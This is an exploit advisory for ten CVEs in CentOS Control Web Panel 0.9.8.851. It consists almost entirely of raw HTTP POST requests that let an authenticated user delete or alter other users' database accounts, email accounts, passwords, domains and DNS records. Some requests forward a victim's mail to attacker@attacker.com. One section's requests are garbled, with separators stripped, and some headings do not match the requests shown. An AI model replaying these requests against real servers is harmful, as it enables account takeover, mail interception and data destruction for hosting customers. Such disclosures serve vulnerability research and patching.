CVE Number : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730 Date : 24 Jul 2019 Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak Vendor Homepage : https://control-webpanel.com/ Software Link : Not available, user panel only available for lastest version Product Name : CWP (CentOS Control Web Panel) Version : 0.9.8.851 Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit) Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE Attack Requirement : Authenticated User ------------------------------------------------------------------------------------------------------------- CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account ------------------------------------------------------------------------------------------------------------- POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 31 Connection: close Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 user=&host=localhost ------------------------------------------------------------------------------------------------------------- CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 7 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 email= ------------------------------------------------------------------------------------------------------------- CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 21 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 email= ------------------------------------------------------------------------------------------------------------- CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 14 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 email=bob2@bob2&goto=attacker@attacker.com ------------------------------------------------------------------------------------------------------------- CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 38 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 email="a=1048576000 ------------------------------------------------------------------------------------------------------------- CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account ------------------------------------------------------------------------------------------------------------- # Access POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1 Host 192.168.80.1482083 User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0 Accept Accept-Language en-US,en;q=0.5 Accept-Encoding gzip, deflate Content-Type applicationx-www-form-urlencoded; charset=UTF-8 csrftoken 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With XMLHttpRequest Content-Length 16 Connection close Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2 domain=bob.com ------------------------------------------------------------------------------- # Delete POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1 Host 192.168.80.1482083 User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0 Accept Accept-Language en-US,en;q=0.5 Accept-Encoding gzip, deflate Content-Type applicationx-www-form-urlencoded; charset=UTF-8 csrftoken 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With XMLHttpRequest Content-Length 111 Connection close Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2 domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400®=A&flag=undefined&tag=undefined ------------------------------------------------------------------------------------------------------------- CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 45 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 email=&pass1email=P@ssw0rd ------------------------------------------------------------------------------------------------------------- CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account ------------------------------------------------------------------------------------------------------------- POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 73 Connection: close Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com ------------------------------------------------------------------------------------------------------------- CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain ------------------------------------------------------------------------------------------------------------- POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 32 Connection: close Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 domain=&subdomain= ------------------------------------------------------------------------------------------------------------- CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain ------------------------------------------------------------------------------------------------------------- POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1 Host: 192.168.80.148:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430 X-Requested-With: XMLHttpRequest Content-Length: 12 Connection: close Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2 domain=